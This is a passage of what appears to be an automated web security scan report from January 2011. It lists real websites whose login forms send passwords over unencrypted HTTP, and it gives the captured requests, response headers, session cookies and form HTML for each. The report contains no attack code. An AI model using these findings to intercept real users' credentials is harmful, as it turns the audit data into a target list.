Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.trainingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.114. http://www.transportationcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126822

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.transportationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.115. http://www.travelingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111343

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.travelingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.116. http://www.truckingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:38 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109322

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.truckingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.117. http://www.tvcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.tvcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.118. http://www.underwritingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.underwritingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.119. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>


<form id="loginForm" name="loginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9NNGhyUDM0MzgwMDA5LzIyMjA5L2xp/" method="POST" >
   <input type="hidden" name="WPSRedirectURL" value="http://www.vault.com/wps/myportal/usa/companies/company-profile/Vinson-&-Elkins-LLP"/>
...[SNIP]...
</label>
   <input id="join-password-input" name="password" type="password" value="" />
   <br clear="all" />
...[SNIP]...
</label>
   <input id="join-passconf-input" name="UserConfirm" type="password" value="" />
   <label for="join-zip-input" id="join-zipcode">
...[SNIP]...

6.120. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</div>

<form id="mainLoginForm" name="mainLoginForm" action="/wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L3dDb1ZJQSEhL3dPb0JKTnNBLzREMGo5ZWtBU0VFIS9JNGhyUDM0MzgwMDA4LzIyMjA4L2xp/" method="POST">
                   <div class="lightbox_text2">
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" />
                       <br />
...[SNIP]...

6.121. http://www.veterinarycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.veterinarycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.122. http://www.volunteercrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109074

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.volunteercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.123. http://www.woothemes.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woothemes.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Fri, 21 Jan 2011 19:37:28 GMT
Vary: Cookie
Expires: Fri, 21 Jan 2011 20:37:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: a9602306e2be29cba5c13f300262aee7
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div><form name="loginform" action="http://www.woothemes.com/wp-login.php" method="post"> <label for="userid" class="fl">
...[SNIP]...
</label> <input class="password fr" type="password" name="pwd" value="" id="password" size="10"/><div class="fix">
...[SNIP]...

6.124. http://www.workathomecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117680

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.workathomecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.125. http://www.writingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:54 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
